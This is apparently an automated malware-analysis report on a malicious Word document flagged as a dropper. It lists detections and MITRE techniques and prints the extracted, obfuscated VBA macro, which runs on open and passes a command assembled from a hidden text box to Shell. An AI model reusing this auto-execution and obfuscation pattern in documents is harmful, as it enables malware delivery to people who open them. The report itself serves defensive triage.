MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and utilizes the Shell() function, indicating an attempt to execute external commands. This is strongly suggestive of a downloader or droppper functionality, where the macro's primary purpose is to fetch and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Valyria-6786418-0' further supports this assessment.
Heuristics 9
-
ClamAV: Doc.Dropper.Valyria-6786418-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6786418-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set GomFBhFEZAjciYcbvAZ = rrjnfISWnaKsnvADt mCMisjiv = Array(IKziGn, ZOHrzJFD, rVjcnbFYO, Interaction.Shell(tOQlqS, ZJEskE), PqJIaRi) Select Case wTmIZNajhowpbznOjabtpA -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() ofzbwn -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9291 bytes |
SHA-256: 7b637f4f4b84f5f1c11e5ca08a276ba22fdd4f8649a62c785053e293a220e6ab |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
253 of 291 identifiers look randomly generated (e.g. 'TcsKkqPPidaTcBHdPicalNDV') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ackNspllSXjs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ofzbwn
End Sub
Attribute VB_Name = "kaMjEnZEv"
Function ofzbwn()
On Error Resume Next
Select Case vKDtPmLmWHbZCCJrLj
Case 72333624
iYiXcWRTcdDzRlaPwdw = wRSlkGCErGFZvpsXc
QsVsJsEdHQctuintiNFw = Log(WUMbWYdCctDnQMDvDIajGw)
czLWmBKiSfstYJQnUbafX = 164624586
iWjzbFfQjYijdKB = BSOkIXSimmUGFfTNDshACDj
Case 168852348
OMVpZmcSkZMJowGDELokYK = 4145504
UfldAozjoztLzoM = Log(snVGGEPvbzzsupODLQVtBzSv)
dUrDuFQworlpuwQQqBC = 281920098
oziqAjTTwtUZdcj = Log(sjshtFzcORSFdKzQEWo)
End Select
Set IMuZwfpwRQQVjrwVKJ = iCFbiNOqovEUHoOQ
Select Case cTwZwiuOuaGCZPv
Case 335124346
rQGJstNXNnPHHd = skYiOWMwXNZIkWYDHvbqzjvk
kCjviGnzLJprMkjiRiv = Log(kcAokIMfmvJonIdUd)
sHmLZMjMuKvMhA = 339800782
qIBuLWtHKPzADEHLA = qojZDoFXNBkaNJpVS
Case 139478589
jsWNiAJMjIpCjLTKLl = 110506701
MonIrXjCqLimms = Log(WTaCYtbWPXwAPuzdk)
QGuFNWHRHWYaDQ = 283969453
zqljsLlSYksWUHqhzlVmWRF = Log(uHmFwoUiJVwIsB)
End Select
Set FVcjddlwzfqcRuF = jkjolYjTjPKMzKhowc
Select Case clmPIkOzcFjNJQVURFhzt
Case 226201973
azvQvuoZwkuLrJrzuLoiGqzN = fZsWCHptoMPMTSDnfkdPEiL
HmlFDqjAiZQUvDtcESD = Log(blaslqbGWwmAOSOQVkpzdPdu)
jsbqAKmbOzWLtT = 88893107
cdkmPFdodHTcFTMIj = CwzQWnAZAUsEcRciBltInd
Case 97622983
NtrJVvlNfCRPPMHwlpFIwY = 202011127
AWSaOXDYjMCdwq = Log(FjiZZzNTodwXzY)
roOoJwcLwHzsfCJ = 203083792
ulAZRzFCnDdwSA = Log(AdVOOHhGcYfRZGh)
End Select
Set fwvcMYhZoJlWuzOjH = sChuQtNiYAlhfwFnwzXXscv
Select Case LcOHSbfuDbtqadw
Case 158182988
PXcNNEpBjdHqDnBnbqnsfCjt = QUzvwWjCIwrsuzY
FjzXDznsCznLfRMojFz = Log(sGmHYovpJvhsPTZTlVEQj)
tziXWqmDIoAnjzw = 279504140
PEwiHSvwMrsCNBjEnMoYARED = msrbnaWvWpMiWlf
Case 260528447
KztAunUjsmISzzzvcVZ = 23713361
ZRWHrMTWRbIkZHFJFr = Log(XsunOdZrMmtQGjH)
hWtDbANaKzhYqulWdUjbi = 197183736
dRVGjXLCASWXmMn = Log(WfUcPvAASBXmlDfFDPPl)
End Select
Set tdCzwjGUXwKprJw = BshRUoiAZRzmQTXw
Const ZJEskE = 0
Select Case hlYFOCofacrbzIYNn
Case 12081616
zPzzKQPzGjPilazGjIpi = kmzLCEnUzpRTmDzknN
zFizKuFBABpEzXJMcAmILb = Log(HqwOzWAWvvziPCnmQwCn)
JkTwdrWkBEdXbaIMjG = 204659795
itJzstJpNVLJoKzFiSVfdmuq = GobiZjqXnoQbWDkhjW
Case 208094654
UjRdCiOkzVszTblFiLomVmB = 145855366
iIOlwzQOwCXWwbrVFXRvR = Log(uSiwVhtXiivwYaz)
BYckWZNjkkzQQOjaQWNwGzci = 139406412
TpaCCRWFVsSjlVEvOlk = Log(HTwUfCMCtCwuPzFYIhhf)
End Select
Set KsrHjkrsKkqzrRzrFWAETMT = YRoQfnjEFjzbGNwRVKiSFzXj
Select Case NpLTlXWfviCZjZlrhiHWFhdj
Case 157892767
DqPtKXwpkDFzmjkttmLNw = cHmsRrqfLcvEUfQBTiduoi
hramMorYKjNOHHSGFwErdE = Log(MEcrSjjDBtVEArFirTDkV)
RItAYYwkqJdJNhj = 321434677
sbfMUlCSPzUNYZTMFnU = RHKHQCLbqdYuuuLIpuwXriJY
Case 184599046
SjJzItPzHlQYvRZbcl = 182175315
SiOKXKqwGjwmftkcRtV = Log(fvnasRzfzPGXzCEnVzZz)
SsXmitBjzKiQzu = 152670997
oSGLLzrdaocpzGRTXbMCPnN = Log(zwzEXGzHhwjhTmrSBuM)
End Select
Set QMjqsPtViUcBEiNMAmFTpU = BZkzljtBUaXHlPI
Select Case hXMjhrDsGrktMEvKvhbo
Case 293378800
pAJAWABuhOjctJOwQzWEzT = BVqMCRXzzmuhLXjV
qLKWNjLlwzQbRo = Log(WpHfjnwcJPjqwcCYkiTNnI)
omiaGSHXfwHKWPAoPrjBHi = 293489342
JtbfzwazOBTtBMsK = rDsrRjIjpDVEHj
Case 66706650
SRNrbahXHwUwHnDzZzPaAUr = 86672704
vHuEvGUJzjvfTaRWV = Log(ULLcCAWfIQjtzZzYfSmSL)
znHEHUFYwEfkXBHTFuiQwE = 170671336
lVfvuwjCZiLYVws = Log(ZjRiOMCwRMNsju)
End Select
Set vNASmoKdAUcLspizHBjrPmv = YShdikrSinQLVfFNOFRJlBK
tOQlqS = ackNspllSXjs.TextBox1 + tUHjv + GrDDbI + JhEZXbb + cKVlGX + vTiAOa + nivlb + BjbUF + tNmlG + jBWMilck
Select Case bjipRsZoFDKQhriTkW
Case 88995193
ZEoukQwPGFTvViMUrWKHk = wGBdVwdiwEMmzXrkEBw
hAkOuCiJbOMFzBHi = Log(HuzmbGOjjhpdHRILZqvVniT)
UDjsGmvPJszHwYGuW = 205283633
VpfUwDtZKMMFYbhS = XWczlZTPUBPBkBzHXwc
Case 265489337
moMMkDwmZfPGhWzCNjPLE = 189082055
iYaKNzAdEdpkiP = Log(AVWcvVzuCiAFKONciKmin)
tjpYCKcsmRmcitoc = 220908180
idXfNrqOrBLawhwqcmnW = Log(oSKsiShjTnCcGDKnNW)
End Select
Set hnTbhLVFfsQBoKMqLMniZJiX = JwpimDPQqpfVqdjN
Select Case SoPDXiioOdENXLjtsfwLvUq
Case 128223372
TLGhSKQQljiQXqkQEtqhSqV = havQrwwwwLETXHvSnwmcBdUo
urbzladpKAsPzZml = Log(TMmRtwzXuVDtuDGGEzHW)
KkadMHDDnXArWJHCuBudbrFZ = 318543185
wlJubfOjJcLnjpuUG = DBXuwEKwMtXTfAhwKRtsvVdq
Case 342030967
qHUEjGkHWusBmFkfSUIp = 325625307
FjicbNCiYhuTODbH = Log(RiXdmEJioIQCJhJh)
BkaGfXFoWKHSqhDLJqHa = 217533452
fVzmFlfPzkmjCqhElL = Log(pQtBLzaMrzrCHwhFE)
End Select
Set tRTJHKWjHfNdFEv = rCmTmoiZnPIiflU
Select Case TKsBwlYRIwwRDYknzS
Case 13396384
wppZCHJSERcwko = PfukfiOEORPURBljwSZYdUSz
bFNrVzhPbVHCiWXjlbInms = Log(ShijLPUuNvuEYBNsR)
FqfdjQwBprtJLDjouJrTW = 340075020
buGnRziXjqFjBlp = NjJacBEkrUkGEA
Case 329930767
FjEjZciCHTJTGWhC = 37696873
djMZiZqWvwPbTis = Log(aRhFblFHSIrkdVnhAvWOzjF)
tDhhmfzaaMvPVAjsiEGV = 221603626
sZJhbXMiuuMCMYD = Log(UmIRKRaXMAPdjuZkzo)
End Select
Set HXFEcOwSADTnIpHj = MQvbzmUaIiuzVbEXNw
Select Case DVBUjmwlowSdwUVSEfqqt
Case 176762108
TcsKkqPPidaTcBHdPicalNDV = XBVsatqcXhrqbNuYjnzW
tRwBbMRAMGZXiM = Log(tWDkjqETQnnQhBEaEzfijZ)
zjZbLbSTzAFfKjOnKpwjOnv = 233771448
HfVXziGUjEDJPsszTqQbWuqp = UolscMlqcDvzvwSz
Case 69651768
fKdvwFiuwfHdMpfLitVb = 25318290
STmowAXszcLQKiiZsfJhPGi = Log(rGRkTYiiansKIHIiXDhfRviB)
EBpSWcLknzqjnYZwdqWl = 158975002
kWbKLYDhvbPHPXoQD = Log(jaUJSzjfIjoEHPEn)
End Select
Set TrMQnjFCPTfJBJMnL = zwaEbajQWtqTzD
Select Case KASYWowlRGJFKXkC
Case 315556982
MboLinVjACIWNTP = MJtnYijvciiqFnUiXuk
WwRiCqotdvtqqlLaJIihvsi = Log(JfbNidwTiUCNrPkiqmSjonzT)
tVOLCzdQRUWObLzzaHV = 234294349
jtYArIaBLVjIlpIkIjVYwZuN = OaTjOjijdKcqKLqDOG
Case 337771710
FqWrMSbALBJwKjchHRwpBZH = 204247076
uzUiUiSvXOYEbWwEiYbA = Log(fijIwwKJojirLSUGVqTq)
nRDdfuAkXAjiCO = 126095082
WYlIliiqNQDbwIhIKZsMf = Log(QBJZRfCMJEBVzSihSEjN)
End Select
Set PqZmOTXUcWGFqHjzM = CnAHzZcJPZcHndSPB
Select Case LlwuuVIPZECzhsX
Case 289870747
ktINjaMzSPrdrjJFjbla = jQtEbkpzalANvimZsbLlvb
QliUsuzRlRpEcOJ = Log(pXzsirQvEXjrzao)
ELcStPwFcTOvFaJLiUVOvja = 168390696
mPVNGSLcwzRlrNabtP = cUpiOVIiEazUlDzH
Case 339399237
sWBDTJasZrGvnCUOwBw = 244063328
sznGCwifitGaABt = Log(ZAjEWwRYJnuAWGwK)
UzYOwQKvMqzzUnBaF = 152613656
QjjwjOzPDdJbzv = Log(fBUvdjVIKFTZpzta)
End Select
Set jwuhkDrzwBHRCOzDH = AGJtQuXZrNpIPKD
Select Case mIwBzPwMsiqTcLQKalchj
Case 66512996
MLOfEGvrdnhZwwT = fjjYImWvGAQzrdlzcDm
lksGznNfumSNGJwwAlzZoT = Log(DqwAACizvKdqvrcbVZq)
UhCshjnzqGMBSL = 267046734
BmMdLpWCdTAHXKbAz = EWnDTTPjGpwbYkCMZ
Case 225629749
NpfKAOOjjbfiLDzG = 121429794
zTtObihDBuQELktokdZL = Log(pFniIaLnXZdjicOTwNwdwN)
PbQvkXTVhHqIOGfTHW = 109663275
VnUcIfVlQchqblXHrfaQ = Log(DvcsUAMTtpHfjw)
End Select
Set GomFBhFEZAjciYcbvAZ = rrjnfISWnaKsnvADt
mCMisjiv = Array(IKziGn, ZOHrzJFD, rVjcnbFYO, Interaction.Shell(tOQlqS, ZJEskE), PqJIaRi)
Select Case wTmIZNajhowpbznOjabtpA
Case 70667404
iaIDJSBUmLHsLEKls = YKfCHSLorMvEzvIUZw
XWPmdDPsuDcPqBV = Log(zljTprUboYhOLkqiLfU)
JYCwraRlOzFDbUIjtiPfBnzE = 145842006
hKNzDKjZRbjhcP = jNrTinqbHkhPpuWbzcq
Case 295235919
XQtuWCCjzMCAFSZ = 37900643
rNqjGNWvrivAlElWTLwwZ = Log(kouHYfPjcwVMkcC)
RDWzfYHjNHQilGdHLj = 188816715
owprjHBwfZTIUw = Log(sbabMjOtQOkwWTNBBAziTOf)
End Select
Set YWJBonHKoMkjkHPWaE = cvIffRXSIUOaivHDqXN
Select Case vShdHQSLkUzzaTbHcuMt
Case 103694278
tKICpPmhGtVplGHnzQHJ = iwXXBIYSfzLOPYXU
bDZDNGikhVzpvw = Log(GUKLlfnGOObtKbWhkSuoDj)
VstmUnZdkCYHuNM = 231198183
ozLomMTJLnPWAHjWLpT = tTTolrrmTcTXjVAGYTifZcJ
Case 341926888
GjvpkiXtrfUdWDuV = 220552214
jTrmfGdwsGnRQJTiiIvwit = Log(ispjcBPoKsnajSTDoLmqRFZP)
KrZmZkGpXNupaAwc = 121497679
ZdjmMKEHkwCiYSaVRKqC = Log(HjkJFYNOKpOwcAmbXfOhS)
End Select
Set KnsocPFjmlQtRzzdGlqsZGoj = SottfbUSIVzQQwwJbDcijipb
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.